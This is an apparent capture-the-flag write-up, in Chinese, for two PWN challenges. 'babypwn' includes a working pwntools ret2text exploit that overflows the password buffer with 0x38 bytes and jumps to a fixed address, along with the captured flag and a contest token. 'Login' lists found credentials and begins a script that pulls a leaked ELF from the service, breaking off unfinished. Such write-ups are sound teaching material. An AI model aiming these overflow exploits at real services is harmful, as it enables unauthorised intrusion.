# PWN

## babypwn

ret2text

思路:password 的读入存在栈溢出,先用 0x38 字节填充,再用 p64(0x40117A) 覆盖返回地址(从使用固定地址来看,程序应未开启 PIE)。

```python
from pwn import *

io = remote("prob07.contest.pku.edu.cn", 10007)
# io = process("./pwn")
context.log_level = "debug"
io.sendlineafter(b"Please input your token: ", b"522:MEUCIQCosOLImE2i11gtdIBeP9r5hu3E3FWIZdqixPB_QpEjwAIgS009Snrl5oFLGCL_134AkS-89M8nG7kzl127hf29584=")
io.sendafter(b"Enter your username:", b"root")
# gdb.attach(io, "b* 0x4011E9")
# pause()
io.sendafter(b"Enter the password:", b"a" * 0x38 + p64(0x40117A))
io.interactive()
#flag{KooD1EijiemeePH8ieNei2XoL8iCh5de}
```

## Login

没有附件,测试发现 password 存在栈溢出,并且会有回显数据。

发现登录账号和密码:

username: admin password: 1q2w3e4r

尝试登录。

登录成功后发现回显数据有很明显的 ELF 文件头。

接收数据写入文件:

```python
io.sendlineafter(b"Please input your token:", b"522:MEUCIQCosOLImE2i11gtdIBeP9r5hu3E3FWIZdqixPB_QpEjwAIgS009Snrl5oFLGCL_134AkS-89M8nG7kzl127hf29584=")
io.sendlineafter(b"Username:", b"admin")
io.sendlineafter(b"Password:", b"1q2w3e4r")
io.recvuntil(b"Core dumped\n")
hex_data
```
………………………………